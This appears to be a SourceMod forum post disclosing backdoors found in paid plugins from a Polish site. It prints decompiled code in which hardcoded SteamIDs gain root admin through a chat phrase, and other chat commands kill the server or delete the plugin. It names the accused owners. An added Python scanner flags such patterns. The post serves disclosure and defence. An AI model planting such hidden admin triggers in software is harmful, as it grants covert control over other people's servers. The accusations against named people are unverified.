AntyIdiotsTeam
New Member
Join Date: Jun 2019
06-21-2019, 22:38   Polish website selling plugins without sourcecode and attaching backdoors.
#1

Hello,
so first of all, we are the Polish team that tries to get Polish SourceMod developers sorted and make sure everyone is legal.

For a few months there has been a fun site called https://pluginysm.pl/

So, they are selling plugins for some money, well, I like that, BUT there are 2 things.
First: They are breaking the LAW of the SourceMod license, because 3/4 of the plugins don't have any source code, only compiled SMX, and there is a backdoor inside the SMX plugins.

After scanning some of the plugins and decompiling them, you can find some bad shit there:

base64_cFillChar;
base64_decodeTable[256] =

PHP Code:
if (StrEqual(steamid, "STEAM_1:0:189210523", true) || StrEqual(steamid, "STEAM_0:1:452047314", true) || StrEqual(steamid, "STEAM_1:1:3685391", true))
    if (StrEqual(Text, "take access", true))
    {
        PrintToConsole(client, "~~~ Hello Roberrt or DevLogic !");
        PrintToConsole(client, "~~~ Crashing system in progress..");
        PrintToConsole(client, "~~~ Access Granted !");
        PrintToConsole(client, "~~~ Welcome in root strafe !");
        // 14 is Admin_Root in SourceMod's AdminFlag enum
        AddUserFlags(client, 14);
        ClientCommand(client, "play *UI/deathmatch_kill_bonus.wav");
    }

So as you can see there, the 2 owners of the website Pluginysm.pl have FULL ACCESS to the server and all the permissions; basically, that's probably why they didn't attach the source code ;).

The OWNERS:
1. https://steamcommunity.com/id/imroberrt
2. https://steamcommunity.com/id/matix8981/


PHP Code:
if (StrEqual(Text, "off plugin", true))
{
    // Hostname text: "PLUGIN THIEVES!!!!"
    ServerCommand("hostname ZŁODZIEJE PLUGINÓW!!!!");
    // "Unlawful use of the plugin detected, it is being disabled."
    SetFailState("[ROBERRT][BACKDOOR] Wykryto bezprawne uzywanie pluginu, zostaje on wylaczony.");
}

if (StrEqual(Text, "off server", true))
{
    ServerCommand("hostname ZŁODZIEJE PLUGINÓW!!!!");
    // "Unlawful use of the plugin detected, the server has been shut down remotely."
    LogError("[ROBERRT][BACKDOOR] Wykryto bezprawne uzywanie pluginu, serwer został zdalnie wyłączony.");
    ServerCommand("killserver");
}

if (StrEqual(Text, "delete plugin", true))
{
    ServerCommand("hostname ZŁODZIEJE PLUGINÓW!!!!");
    // "Unlawful use of the plugin detected, it has been removed remotely."
    LogError("[ROBERRT][BACKDOOR] Wykryto bezprawne uzywanie pluginu, został on zdalnie usunięty.");
    DeletePlugin();
    ServerCommand("killserver");
}
I don't know how stupid you have to be to think that ServerCommand "killserver" is a secure thing to do, but anyway, I found that there are many includes and some weird extensions attached that allow for remote access as well.


So now, I want to ask the SourceMod developers and moderators what kind of investigation would be fast and work 100% to close up this shit pretty fast, and to get people to answer for their actions.
Deliberate insertion of backdoors is, from what I know, illegal, so that's the second shot.

I created the topic on a Polish forum as well, but the owner of this site (Pluginy SM) was just laughing that they got 2 more purchases and more views on the website. Shorter version: they don't give a fuck.

I want to know your opinion about that, guys, and get some helpful comments.


Fun fact: The owner of pluginysm has an account here
His Steam ID - https://steamcommunity.com/id/imroberrt
His profile on these forums - https://forums.alliedmods.net/member.php?u=274727

Last edited by AntyIdiotsTeam; 06-21-2019 at 23:08.
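
For server operators who only have the compiled .smx, a triage scan for the pattern in the decompiled code above: hardcoded SteamIDs sitting next to admin-flag or shutdown calls. This is an added example, not part of the original post; the SMX header layout (24-byte packed header, magic 0x53504646, zlib-compressed body starting at dataoffs) and the names smx_image, scan_smx and build_sample are assumptions of this example, and the sample input is constructed.

```python
import re
import struct
import zlib

SMX_MAGIC = 0x53504646            # assumed SMX container magic
# Assumed packed header: magic, version, compression, disksize, imagesize,
# sections, stringtab, dataoffs (24 bytes, little-endian, no padding).
HDR = struct.Struct("<IHBIIBII")
STEAMID = re.compile(rb"STEAM_[0-5]:[01]:\d{1,10}")
# Markers taken from the decompiled snippets in the post.
MARKERS = (b"AddUserFlags", b"killserver", b"ServerCommand")


def smx_image(blob: bytes) -> bytes:
    """Return the plugin image with its body inflated, or the blob unchanged."""
    if len(blob) < HDR.size:
        return blob
    magic, _ver, compression, _disk, _img, _n, _strtab, dataoffs = HDR.unpack_from(blob)
    if magic != SMX_MAGIC or compression != 1 or not HDR.size <= dataoffs < len(blob):
        return blob
    try:
        return blob[:dataoffs] + zlib.decompress(blob[dataoffs:])
    except zlib.error:
        return blob  # damaged or unknown packing: fall back to a raw scan


def scan_smx(blob: bytes) -> dict:
    """Report hardcoded SteamIDs and privilege/shutdown markers in one plugin."""
    image = smx_image(blob)
    ids = sorted({m.group().decode() for m in STEAMID.finditer(image)})
    hits = [m.decode() for m in MARKERS if m in image]
    # A hardcoded identity next to admin-flag or server-command calls matches
    # the shape of the post's decompiled code; either alone is only a lead.
    return {"steamids": ids, "markers": hits, "suspicious": bool(ids and hits)}


def build_sample(body: bytes, compressed: bool = True) -> bytes:
    """Constructed test input: a minimal SMX-shaped blob, not a real plugin."""
    packed = zlib.compress(body) if compressed else body
    hdr = HDR.pack(SMX_MAGIC, 0x0102, int(compressed), HDR.size + len(packed),
                   HDR.size + len(body), 0, HDR.size, HDR.size)
    return hdr + packed


if __name__ == "__main__":
    # Constructed SteamID and strings, not values from a real plugin.
    sample = build_sample(b"\0AddUserFlags\0STEAM_1:0:12345\0take access\0")
    print(scan_smx(sample))
```

A hit is a reason to decompile and read the plugin, not proof of a backdoor: legitimate plugins also call ServerCommand, and some hardcode an author's SteamID for credits.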